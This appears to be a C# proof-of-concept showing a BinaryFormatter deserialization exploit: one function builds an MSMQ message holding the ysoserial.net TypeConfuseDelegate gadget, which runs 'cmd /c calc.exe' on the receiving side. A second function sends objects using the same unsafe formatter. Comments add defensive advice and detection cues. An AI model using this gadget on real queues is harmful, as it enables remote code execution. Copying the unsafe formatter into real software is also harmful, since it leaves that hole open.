/* This code creates a gadget that will be executed when deserialized by BinaryFormatter,
         * which is the internal deserializer for BinaryMessageFormatter.
         * Taken from ysoserial.net - https://github.com/pwntester/ysoserial.net/blob/master/ysoserial/Generators/TypeConfuseDelegateGenerator.cs
         * This gadget was created by James Forshaw
         */
        /// <summary>
        /// Builds an MSMQ <c>Message</c> whose body is a serialized <c>SortedSet&lt;string&gt;</c>
        /// carrying a tampered comparer delegate. It is a proof-of-concept showing why
        /// <c>BinaryMessageFormatter</c> must not be used to read messages from senders that are not fully trusted.
        /// </summary>
        /// <returns>
        /// A <c>Message</c> whose body was written by <c>BinaryMessageFormatter.Write</c>.
        /// The message's <c>Formatter</c> property is not set here.
        /// </returns>
        /// <remarks>
        /// The strings "cmd" and "/c calc.exe" are a harmless execution marker: starting the calculator proves that
        /// the receiving side ran sender-controlled code during deserialization.
        ///
        /// Defensive takeaways for code that consumes such messages:
        /// - BinaryFormatter reconstructs arbitrary serializable types named in the stream, including delegates;
        ///   Microsoft documents it as unsafe for untrusted data, and validating after deserialization is too late.
        /// - Restrict who may write to the queue, and prefer a formatter bound to an explicit list of expected types
        ///   (for example <c>XmlMessageFormatter</c> with <c>TargetTypes</c>) — NOTE(review): confirm it fits the
        ///   message contract.
        /// - For detection, a queue-reading service that spawns <c>cmd.exe</c> or another unexpected child process is
        ///   a strong indicator, as is a serialized stream that references delegate and <c>System.Diagnostics.Process</c>
        ///   types.
        /// </remarks>
        public static Message generateBinaryMessageFormatterPayload()
        {
            // A two-entry multicast delegate built from String.Compare, wrapped as the set's comparer.
            // At this point the comparer is still an ordinary string comparison.
            Delegate            da   = new Comparison <string>(String.Compare);
            Comparison <string> d    = (Comparison <string>)MulticastDelegate.Combine(da, da);
            IComparer <string>  comp = Comparer <string> .Create(d);

            SortedSet <string> set = new SortedSet <string>(comp);

            // Statement order matters: both strings are inserted while the comparer is still String.Compare,
            // so nothing is launched in the process that builds the message.
            set.Add("cmd");
            set.Add("/c calc.exe");
            // Private-field reflection; "_invocationList" is an implementation detail of MulticastDelegate,
            // so GetField can return null on a runtime that names the field differently.
            FieldInfo fi = typeof(MulticastDelegate).GetField("_invocationList",
                                                              BindingFlags.NonPublic | BindingFlags.Instance);

            // The second invocation-list entry is replaced with a delegate of a different signature
            // (Func<string, string, Process> over Process.Start) and written back into d. The declared type
            // Comparison<string> no longer describes what the delegate calls, hence "type confusion".
            object[] invoke_list = d.GetInvocationList();
            invoke_list[1] = new Func <string, string, Process>(Process.Start);
            fi.SetValue(d, invoke_list);

            // Serialize the set (and with it the comparer and its delegate) into the message body.
            BinaryMessageFormatter bmf = new BinaryMessageFormatter();
            Message exploitMessage     = new Message();

            bmf.Write(exploitMessage, set);
            return(exploitMessage);
        }
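        /// <summary>
        /// Serializes <paramref name="objSource"/> with <c>BinaryMessageFormatter</c> and sends it to the local
        /// private queue whose name is <paramref name="strTargetProcess"/> followed by "Inbox".
        /// </summary>
        /// <param name="strTargetProcess">Name prefix of the target queue; concatenated into the queue path.</param>
        /// <param name="strSubject">Text stored in the message's <c>Label</c>.</param>
        /// <param name="objSource">Object written into the message body.</param>
        /// <remarks>
        /// A <c>MessageQueueException</c> is written to the event log under the source "IssueTracker" and is not
        /// rethrown, so callers are not told that the send failed. Other exception types propagate.
        ///
        /// Security: choosing <c>BinaryMessageFormatter</c> here obliges the receiver to deserialize the body with
        /// BinaryFormatter, which is unsafe if anyone other than this trusted sender can write to the queue.
        /// Keep the queue's write permission limited to the sending identity, or move both sides to a formatter
        /// restricted to known types.
        /// </remarks>
        public void SendBusinessObject(string strTargetProcess, string strSubject,
                                       BusinessObject objSource)
        {
            MessageQueue queue = null;

            try
            {
                // NOTE(review): strTargetProcess goes into the queue path unvalidated. If it can ever come from
                // outside the application, check it against the known process names first.
                string strTargetQueueName = ".\\private$\\" + strTargetProcess + "Inbox";

                queue = new MessageQueue(strTargetQueueName);

                // Message is disposable; release it as soon as the send has completed or failed.
                using (Message message = new Message())
                {
                    // Specify the message formatter.
                    BinaryMessageFormatter formatter = new BinaryMessageFormatter();
                    message.Formatter = formatter;

                    // Set the message properties and body.
                    message.Label = strSubject;
                    formatter.Write(message, objSource);

                    // Send the binary-serialized message.
                    queue.Send(message);
                }
            }
            catch (MessageQueueException exception)
            {
                using (EventLog systemLog = new EventLog())
                {
                    systemLog.Source = "IssueTracker";
                    systemLog.WriteEntry(exception.Message, EventLogEntryType.Error, 0);
                }
            }
            finally
            {
                // queue is still null when the MessageQueue constructor itself threw; closing unconditionally
                // would raise a NullReferenceException that hides the original error.
                if (queue != null)
                {
                    queue.Close();
                }
            }
        }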